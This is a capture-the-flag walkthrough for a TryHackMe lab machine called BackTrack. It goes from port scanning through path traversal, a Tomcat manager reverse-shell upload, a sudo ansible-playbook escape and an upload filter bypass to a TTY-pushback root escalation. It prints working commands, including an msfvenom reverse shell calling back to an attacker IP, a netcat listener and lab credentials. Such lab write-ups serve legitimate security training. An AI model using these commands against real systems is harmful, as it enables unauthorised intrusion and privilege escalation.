BackTrack (THM)

Hello Everyone we back again with BackTrack let's get into it.

Enumeration.

Open ports.

// Some codePORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDzPMYVGNn9fk2sUO4qG8t3GP/3ztCkoIRFTSFwnaHtRTiIe8s3ulwJkAyTZHSmedBOMihmyWyEmA44uxY4kUZEiba8R+c7aWHjTvD04VcKWPgVg1URPWMTHyxUcwKGnoh8n6VwM283+/4f2g2GSj2pVbacoV3xfDo8L4PshyfHK7dEd2qnQv9Yge3p5Aw/1Q7w1eaMZnaoicgzDgjhvqrRcS/DRcp3Lwoz6fGQW2/vFxW7d5aisTslKxRPslTy/Vrgprb7I+D9kdGEFqW/DXDfZLo+4O0woecE6+qSYPbIAjvIao25MTR8xHOFR0sCtyVfehEXYxvJ0fsqBG4yp/y15eDT3MSYevdvhHH1ZLejV66zILbPqUhzFBuMW1U6PKvSNPiQdzlnIRpD8ZQN7KJI8Y6zlHgoh8iu7+PgcUQNixYrX1GhMCYwNGHQlLOLriVRzhScZV3ObH1V8+g8I2sc3WZ54G2XUqZX+pN3ugjN1L5mo8mht1m7ZME+W9if37U=
|   256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJfVuy7uiXVmzWVPtY/BYF+RZF36ZR8rh7wxeZi7yeOdWd06henZf8z5rYfalc0YHr6kE3clVa0jq+pF64w/lso=
|   256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHMk87a1jTdUzEWZNm/XtZKIto5reBlJr75kFdCKXscp
6800/tcp open  http            syn-ack ttl 63 aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
| http-methods:
|_  Supported Methods: OPTIONS
8080/tcp open  http            syn-ack ttl 63 Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.93
8888/tcp open  sun-answerbook? syn-ack ttl 63
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sun, 13 Oct 2024 06:02:10 GMT
|     Connection: close
|     <!doctype html>
|     <html>
|     <!-- {{{ head -->
|     <head>
|     <link rel="icon" href="../favicon.ico" />
|     <meta charset="utf-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <meta name="theme-color" content="#0A8476">
|     <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
|     <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
|     <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
|     <!-- }}} -->
|     <body ng-controller="MainCtrl" ng-cloak>
|     <!-- {{{ Icons -->
|_    <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

So we have 22,6800,8080 and 8888.

Enumerate (6800)

So after some search i could not found anything here will enumerate the rest and maybe came back.

Enumerate (8080)

This port uses Tomcat and it need login creds to be able to do anything let's move to the last one to see if we have anything there.

Enumerate (8888)

So as you can see in the image it seems that there is a path traversal in here also as the image of the machine show

So let's try to do some basic path traversal techniques and some fuzzing. And indded it was vulnrable to local file inclusion because it trys to open the file without any checking on the user inputs which is a big no no. 😯

https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e You can refer to this link for more information and how the code actuly work.

url --path-as-is http://backtrack.thm:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:112:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:122:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash

So as you can see we are able to exploit it. Lets try to get something useful now. After a bit of searching i found the tomcat user.

Username: tomcat
password: OPx52k53D8OkTZpx4fr

Inital Access.

Reverse Shell.

After i got the creds i search on how i can use the manager-script role to exploit the system i found that this role mean i can not access the gui managment tool but i can access the end points which is under /manager/text so we all need to do is create reverse shell and upload it to the server. You can refre to the following link great example.

https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00

To create Reverse Shell i used msfvenom.
msfvenom -p java/shell_reverse_tcp lhost=10.11.96.110 lport=4444 -f war -o pwn.war

And for uploading it into the server i used curl
curl -v -u tomcat:OPx52k53D8OkTZpx4fr --upload-file pwn.war "http://backtrack.thm:8080/manager/text/deploy?path=/foo&update=true"

Finally using curl again we can run the code
nc -nlvp 4444 # netcat for sure.
curl http://backtrack.thm:8080/foo

We can find the first flag under the directory of tomcat.

Access as Wilbur.

So as you can see first we have sudo privilage as wilbur on ansible-playbook which is a tool to manage automated tasks. So this one is quite simpel but i actuly take so long to figure it 😢. https://gtfobins.github.io/gtfobins/ansible-playbook/ using this source we can figure how we can spawn a shell from a task

echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >> /tmp/file.yml

chmod 777 /tmp/file.yml

And After that we can simple run the folowing command

/tomcat@Backtrack:/opt/test_playbooks$ sudo -u wilbur ansible-playbook /opt/test_playbooks/../../../../../tmp/file.yml

And after that we simple got shell as wilbur.

Access as orville

So First we will see a message ot wilbur from orville.

And aslo we have another note which contain ssh creds.

So let's see what orville talk about.

We can see here we have a known http port we have not seen before so lets do some port forwarding using SSH.

And now we can access it from port 80 on our machine.

After login we see an upload place and the project run php so we maybe able to execute php on the machine.

We can not simple just upload php file so there maybe some way to do that.

Oh man after some time of testing i found that we can upload a file in a such a way fileName.png.php but this will not be executed on the server let's check the apache config to figure out why

wilbur@Backtrack:~$ cat /etc/apache2/apache2.conf

So that's why. So since we have been performing path inclusion so i belive here we need to do the same. And some testing i came out to find we can using url encoding.

When we encode ../ multiple times it works.

And by doing so we can see this too.

And here we have it.

By the way this is the payload i used.

And now let's just upload our revser shell.

After Open python server with

python3 -m http.server 8000

And now we know the file is in the machine.

Let's change permisions and execute.

%63%68%6d%6f%64%20%2b%78%20%65%78%70%6c%6f%69%74%2e%73%68

Now let's run it.

Access as Root.

To get some stable shell i generate ssh key

This will produce orville and orville.pub key copy the content of orville.pub into /home/orville/.ssh/authorized_keys , and copy the content of the orville into your machine and change its premission to 600 and login with it.

Exploit TTYPushback.

After some search i used pspy64 to see what is going on under the seen and i saw this.

So basiclly the root user login via ssh and switch user to orville user which then zip some stuff. The problem here is that the root user does not uses -p tag which used so create new TTY so we maybe able to retrive the root session and execute commands.

https://www.errno.fr/TTYPushback.html This is a great example and how to exploit it.

So this is the python code just change the command to add s bit to bash so we can executed as root and move that into the .bashrc which will be automaticlly executed once the root switchs to the other user.

And after some time we will see this.

Ending

At the end this machine was quite fun and has some new things that i have not seen before 👍